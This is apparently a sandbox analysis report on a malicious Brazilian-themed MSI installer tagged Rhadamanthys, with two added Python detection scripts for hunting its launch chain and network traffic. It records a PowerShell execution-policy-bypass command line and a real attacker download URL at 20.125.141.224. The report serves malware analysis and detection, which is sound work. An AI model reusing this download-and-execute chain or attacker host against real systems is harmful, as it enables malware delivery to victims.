
Windows Analysis Report
NotaFiscal.msi

Overview

General Information

Sample Name: NotaFiscal.msi
Analysis ID: 803452
MD5: 115c30afbf3a6b6f7fd43b25a0d286d5
SHA1: 20446917c9f8ad50c1ad4432ea17682fe55ba7f4
SHA256: b25ada06ea01e722ac2b932bac8640c84355b29c8c298799e0ee797d18937524
Tags: msi, Rhadamanthys

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected MalDoc
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Drops PE files to the windows directory (C:\Windows)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Checks for available system drives (often done to infect USB drives)
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

  • System is w10x64
  • msiexec.exe (PID: 4472 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\NotaFiscal.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 1396 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 5812 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding DE799B6D65FDD1EFF7D6ADCB97B743B3 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • powershell.exe (PID: 5896 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss846F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi846B.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr846C.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr846D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue." MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
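The process tree above is the standard launch chain of an Advanced Installer PowerShell custom action: the MSI service (msiexec /V) starts a 32-bit custom-action server (MsiExec.exe -Embedding), which runs powershell.exe with -ExecutionPolicy Bypass on a wrapper script pss<hex>.ps1 in %TEMP% that in turn loads the real payload named by -scriptFile (scr846C.ps1 here). The PowerShellScriptLauncher.pdb path and the https://www.advancedinstaller.com string in the dropped MSI*.tmp files listed further down belong to that tool's custom-action DLLs, so benign installers built with it produce the same chain; what makes this sample malicious is the script content (the download from http://20.125.141.224/pro/$ProcName). The following Python is an added detection example, not part of the report or of any Joe Security tooling. It walks constructed process-creation records (PIDs, images and command lines copied from the tree above; the two parent PIDs outside the tree and the final benign control record are assumptions) and flags the chain, returning the %TEMP% files an analyst should collect before the installer's cleanup phase deletes them.

```python
import re

# Constructed process-creation records modelled on the report's process tree
# (fields as Sysmon Event ID 1 / EDR telemetry would carry them). Parent PIDs
# 3000 and 700 are assumed; the last record is a constructed benign control.
EVENTS = [
    {"pid": 4472, "ppid": 3000, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\NotaFiscal.msi"'},
    {"pid": 1396, "ppid": 700, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"C:\Windows\system32\msiexec.exe /V"},
    {"pid": 5812, "ppid": 1396, "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "cmdline": r"C:\Windows\syswow64\MsiExec.exe -Embedding DE799B6D65FDD1EFF7D6ADCB97B743B3"},
    {"pid": 5896, "ppid": 5812,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": (r'-NoProfile -Noninteractive -ExecutionPolicy Bypass '
                 r'-File "C:\Users\user\AppData\Local\Temp\pss846F.ps1" '
                 r'-propFile "C:\Users\user\AppData\Local\Temp\msi846B.txt" '
                 r'-scriptFile "C:\Users\user\AppData\Local\Temp\scr846C.ps1" '
                 r'-scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr846D.txt" '
                 r'-propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."')},
    {"pid": 1260, "ppid": 5896, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 7001, "ppid": 7000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -ExecutionPolicy Bypass -File "C:\Scripts\inventory.ps1"'},
]

# Advanced Installer's PowerShellScriptLauncher drops its wrapper as
# %TEMP%\pss<hex>.ps1 and the payload as scr<hex>.ps1 (the names in the report).
TEMP_LAUNCHER = re.compile(r"\\AppData\\Local\\Temp\\pss[0-9A-F]{1,4}\.ps1$", re.I)
# powershell.exe accepts any unambiguous prefix of -ExecutionPolicy, plus -ep.
EXEC_POLICY_FLAGS = {"-executionpolicy"[:n] for n in range(3, 17)} | {"-ep"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def tokens(cmdline):
    """Split a Windows command line, keeping quoted arguments whole."""
    return [q or s for q, s in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def arg_value(toks, name):
    """Value following a named switch (case-insensitive), or None."""
    for i, t in enumerate(toks[:-1]):
        if t.lower() == name.lower():
            return toks[i + 1]
    return None


def bypasses_execution_policy(toks):
    for i, t in enumerate(toks[:-1]):
        if t.lower() in EXEC_POLICY_FLAGS and toks[i + 1].lower() == "bypass":
            return True
    return False


def detect_msi_powershell_custom_actions(events):
    """Flag powershell.exe launches that look like MSI custom actions.

    One finding per suspicious powershell.exe: pid, severity, the reasons,
    and the %TEMP% script/property files to collect before msiexec removes them.
    """
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) != "powershell.exe":
            continue
        toks = tokens(e["cmdline"])
        parent = by_pid.get(e["ppid"])
        reasons = []
        if parent and basename(parent["image"]) == "msiexec.exe":
            reasons.append("parent is msiexec.exe")
            if "-embedding" in parent["cmdline"].lower():
                reasons.append("parent is a custom-action server (msiexec -Embedding)")
        if bypasses_execution_policy(toks):
            reasons.append("-ExecutionPolicy Bypass")
        script = arg_value(toks, "-File")
        if script and TEMP_LAUNCHER.search(script):
            reasons.append("launcher script pss*.ps1 in %TEMP%")
        artifacts = [p for p in (script, arg_value(toks, "-scriptFile"),
                                 arg_value(toks, "-propFile"),
                                 arg_value(toks, "-scriptArgsFile")) if p]
        if not reasons:
            continue
        from_msi = any(r.startswith("parent is") for r in reasons)
        severity = "high" if from_msi and len(reasons) >= 3 else ("medium" if from_msi else "low")
        findings.append({"pid": e["pid"], "severity": severity,
                         "reasons": reasons, "artifacts": artifacts})
    return findings


if __name__ == "__main__":
    for f in detect_msi_powershell_custom_actions(EVENTS):
        print(f["pid"], f["severity"], "; ".join(f["reasons"]))
        for a in f["artifacts"]:
            print("   collect:", a)
```

Run it directly to print the findings: PID 5896 scores high with four artifacts to collect, the interactive control only low. The flag set covers powershell.exe's abbreviated switches (-ex, -exec, -ep); pwsh.exe is not matched by the basename check and would need adding.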
No configs have been found
Yara matches

Sample
Source           Rule                                        Description                                     Author
NotaFiscal.msi   JoeSecurity_MalDoc                          Yara detected MalDoc                            Joe Security
NotaFiscal.msi   JoeSecurity_PowershellDownloadAndExecute    Yara detected Powershell download and execute   Joe Security

Dropped files
Source                            Rule                                        Description                                     Author
C:\Windows\Installer\6e7bc0.msi   JoeSecurity_MalDoc                          Yara detected MalDoc                            Joe Security
C:\Windows\Installer\6e7bc0.msi   JoeSecurity_PowershellDownloadAndExecute    Yara detected Powershell download and execute   Joe Security

AMSI script buffer (powershell.exe, PID 5896)
Source                 Rule                                        Description                                     Author
amsi32_5896.amsi.csv   JoeSecurity_PowershellDownloadAndExecute    Yara detected Powershell download and execute   Joe Security

No Sigma rule has matched
No Snort rule has matched

            AV Detection

Source: NotaFiscal.msi | Virustotal: Detection: 16%
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: NotaFiscal.msi, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI8075.tmp.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb_ source: NotaFiscal.msi, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr

Spreading

Source: C:\Windows\System32\msiexec.exe | File opened: z:
Source: C:\Windows\System32\msiexec.exe | File opened: x:
Source: C:\Windows\System32\msiexec.exe | File opened: v:
Source: C:\Windows\System32\msiexec.exe | File opened: t:
Source: C:\Windows\System32\msiexec.exe | File opened: r:
Source: C:\Windows\System32\msiexec.exe | File opened: p:
Source: C:\Windows\System32\msiexec.exe | File opened: n:
Source: C:\Windows\System32\msiexec.exe | File opened: l:
Source: C:\Windows\System32\msiexec.exe | File opened: j:
Source: C:\Windows\System32\msiexec.exe | File opened: h:
Source: C:\Windows\System32\msiexec.exe | File opened: f:
Source: C:\Windows\System32\msiexec.exe | File opened: b:
Source: C:\Windows\System32\msiexec.exe | File opened: y:
Source: C:\Windows\System32\msiexec.exe | File opened: w:
Source: C:\Windows\System32\msiexec.exe | File opened: u:
Source: C:\Windows\System32\msiexec.exe | File opened: s:
Source: C:\Windows\System32\msiexec.exe | File opened: q:
Source: C:\Windows\System32\msiexec.exe | File opened: o:
Source: C:\Windows\System32\msiexec.exe | File opened: m:
Source: C:\Windows\System32\msiexec.exe | File opened: k:
Source: C:\Windows\System32\msiexec.exe | File opened: i:
Source: C:\Windows\System32\msiexec.exe | File opened: g:
Source: C:\Windows\System32\msiexec.exe | File opened: e:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: c:
Source: C:\Windows\System32\msiexec.exe | File opened: a:

            Networking

Source: Yara match | File source: NotaFiscal.msi, type: SAMPLE
Source: Yara match | File source: C:\Windows\Installer\6e7bc0.msi, type: DROPPED
Source: unknown | TCP traffic detected without corresponding DNS query: 20.125.141.224 (3 occurrences)
Source: powershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://20.125.14
Source: powershell.exe, 00000003.00000002.388596354.000000000575B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://20.125.141.224
Source: powershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://20.125.141.224/pro/
Source: powershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://20.125.141.224/pro/$ProcN
Source: powershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmp, NotaFiscal.msi, scr846C.ps1.2.dr, 6e7bc0.msi.1.dr | String found in binary or memory: http://20.125.141.224/pro/$ProcName
Source: powershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmp, NotaFiscal.msi, scr846C.ps1.2.dr, 6e7bc0.msi.1.dr | String found in binary or memory: http://20.125.141.224/pro/$ProcName2
Source: powershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://20.125.141.224/pro/detoured.dll6C.ps1
Source: powershell.exe, 00000003.00000002.388596354.00000000056D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://20.125.141.224/pro/detoured.dllx
Source: powershell.exe, 00000003.00000002.388596354.0000000005764000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://20.125.141.2244
Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: powershell.exe, 00000003.00000002.400029001.0000000006481000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.dr | String found in binary or memory: http://ocsp.digicert.com0A
Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.dr | String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000003.00000002.388596354.000000000555A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.388596354.0000000005421000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.dr | String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.dr | String found in binary or memory: http://t2.symcb.com0
Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.dr | String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.dr | String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.dr | String found in binary or memory: http://tl.symcd.com0&
Source: powershell.exe, 00000003.00000002.388596354.000000000555A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.400029001.0000000006481000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.400029001.0000000006481000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.400029001.0000000006481000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.388596354.000000000555A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000003.369099618.0000000005E77000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.400029001.0000000006481000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.dr | String found in binary or memory: https://www.advancedinstaller.com
Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.dr | String found in binary or memory: https://www.thawte.com/cps0/
Source: NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.dr | String found in binary or memory: https://www.thawte.com/repository0W
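The memory strings show the script assembling its download URL from a variable (http://20.125.141.224/pro/$ProcName), with detoured.dll the only concrete filename observed, and the sandbox flagged the connection to 20.125.141.224 because no DNS query preceded it. A hunt over proxy or flow logs should therefore key on the IP and the /pro/ path prefix, and on the generic behaviour (HTTP to an IP literal with no prior resolution), rather than on detoured.dll alone. The DigiCert and Thawte URLs in the same list come from the signed Advanced Installer custom-action DLLs (MSI*.tmp) and are not indicators. The following Python is an added example, not part of the report: it reproduces the sandbox's "TCP traffic without corresponding DNS query" logic over constructed DNS and HTTP log lines (the line format, timestamps, client address and the 203.0.113.x / 198.51.100.x destinations are invented; only 20.125.141.224 and /pro/detoured.dll come from the report) and layers the report's indicators on top.

```python
import re
from datetime import datetime, timedelta

# Indicators taken from the report: download host seen in memory and in
# scr846C.ps1, the URL path prefix, and the one concrete filename observed.
REPORT_IP = "20.125.141.224"
REPORT_URL_PREFIX = "/pro/"
REPORT_FILENAME = "detoured.dll"

# Constructed log excerpts in an invented one-line-per-record format
# (not the report's data): DNS answers and outbound HTTP connections from
# one client. The /pro/x.exe name is made up; the script builds it from
# $ProcName at run time, which is why we match on the prefix.
DNS_LOG = """\
2023-01-15T10:00:01Z 10.0.0.5 query=www.advancedinstaller.com answer=203.0.113.7
2023-01-15T10:00:03Z 10.0.0.5 query=cacerts.digicert.com answer=203.0.113.44
"""
HTTP_LOG = """\
2023-01-15T10:00:02Z 10.0.0.5 203.0.113.7:443 host=www.advancedinstaller.com uri=/
2023-01-15T10:00:04Z 10.0.0.5 203.0.113.44:80 host=cacerts.digicert.com uri=/DigiCertTrustedRootG4.crt
2023-01-15T10:00:09Z 10.0.0.5 20.125.141.224:80 host=20.125.141.224 uri=/pro/x.exe
2023-01-15T10:00:10Z 10.0.0.5 20.125.141.224:80 host=20.125.141.224 uri=/pro/detoured.dll
2023-01-15T10:05:00Z 10.0.0.5 198.51.100.9:80 host=198.51.100.9 uri=/update.bin
"""

IP_LITERAL = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")


def _ts(s):
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def parse_dns(log):
    """-> list of (time, client, qname, answer_ip)."""
    out = []
    for line in log.splitlines():
        ts, client, q, a = line.split()
        out.append((_ts(ts), client, q.split("=", 1)[1], a.split("=", 1)[1]))
    return out


def parse_http(log):
    """-> list of dicts with time, client, dst_ip, dst_port, host, uri."""
    out = []
    for line in log.splitlines():
        ts, client, dst, host, uri = line.split()
        ip, port = dst.rsplit(":", 1)
        out.append({"time": _ts(ts), "client": client, "dst_ip": ip,
                    "dst_port": int(port), "host": host.split("=", 1)[1],
                    "uri": uri.split("=", 1)[1]})
    return out


def find_suspicious(dns_log, http_log, window=timedelta(minutes=10)):
    """Connections with no DNS answer for the destination in the preceding
    window (the sandbox's check), plus hits on the report's indicators."""
    dns = parse_dns(dns_log)
    findings = []
    for c in parse_http(http_log):
        resolved = any(client == c["client"] and ip == c["dst_ip"]
                       and c["time"] - window <= t <= c["time"]
                       for t, client, _q, ip in dns)
        reasons = []
        if not resolved:
            reasons.append("no DNS answer for destination within window")
        if IP_LITERAL.match(c["host"]):
            reasons.append("HTTP Host header is an IP literal")
        if c["dst_ip"] == REPORT_IP:
            reasons.append("destination matches report IOC " + REPORT_IP)
        if c["uri"].startswith(REPORT_URL_PREFIX):
            reasons.append("URI under report path " + REPORT_URL_PREFIX)
        if c["uri"].endswith("/" + REPORT_FILENAME):
            reasons.append("requests " + REPORT_FILENAME)
        if reasons:
            findings.append({**c, "reasons": reasons,
                             "ioc_hit": c["dst_ip"] == REPORT_IP})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(DNS_LOG, HTTP_LOG):
        flag = "IOC" if f["ioc_hit"] else "behaviour"
        print(f"{f['time']:%H:%M:%S} {f['client']} -> {f['dst_ip']} {f['uri']} [{flag}] "
              + "; ".join(f["reasons"]))
```

The two connections to 20.125.141.224 are reported as IOC hits; the last record, to an address the report never mentions, is still surfaced on behaviour alone, which is the part of the logic that survives the attacker rotating the host.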
Source: NotaFiscal.msi | Binary or memory string: OriginalFilenameAICustAct.dllF vs NotaFiscal.msi
Source: NotaFiscal.msi | Binary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs NotaFiscal.msi
Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll (2 occurrences)
Source: C:\Windows\System32\msiexec.exe | Section loaded: tsappcmp.dll (2 occurrences)
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe | File deleted: C:\Windows\Installer\MSI7E7F.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\6e7bc0.msi
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_04ED7682
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_04ED7690
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_04EDAF69
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_04EDAF78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: unknown | Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\NotaFiscal.msi"
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding DE799B6D65FDD1EFF7D6ADCB97B743B3
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss846F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi846B.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr846C.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr846D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: NotaFiscal.msi | Static file information: TRID: Microsoft Windows Installer (77509/1) 52.18%
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_01
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\2125.651
Source: C:\Windows\System32\msiexec.exe | File created: C:\Users\Public\Desktop\Modulo de Segurança
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\TEMP\~DFEBC4385930605D28.TMP
Source: classification engine | Classification label: mal68.troj.evad.winMSI@7/30@0/1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: NotaFiscal.msi | Static file information: File size 1720832 > 1048576
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_04EDA9E0 push es; ret 3_2_04EDA9F6
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI7E7F.tmp (dropped PE file)
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI80D4.tmp (dropped PE file)
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI822E.tmp (dropped PE file)
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI8075.tmp (dropped PE file)
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI7FD8.tmp (dropped PE file)
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX (13 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (75 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7416
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4488 | Thread sleep count: 7416 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4872 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5144 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (4 occurrences)
Note: 922337203685477 is TimeSpan.MaxValue expressed in milliseconds (Int64.MaxValue ticks / 10,000), i.e. an unbounded wait on a synchronisation object rather than a literal sleep of that length.
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI80D4.tmp
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI8075.tmp
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI7FD8.tmp
Source: C:\Windows\System32\msiexec.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation (5 occurrences)
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: powershell.exe, 00000003.00000003.377112565.0000000005D56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.388596354.000000000583A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
            Source: powershell.exe, 00000003.00000003.377112565.0000000005D56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.388596354.000000000555A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.388596354.000000000583A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: NotaFiscal.msi, type: SAMPLE
Source: Yara match | File source: amsi32_5896.amsi.csv, type: OTHER (AMSI scan buffer of the powershell.exe process, PID 5896)
Source: Yara match | File source: C:\Windows\Installer\6e7bc0.msi, type: DROPPED
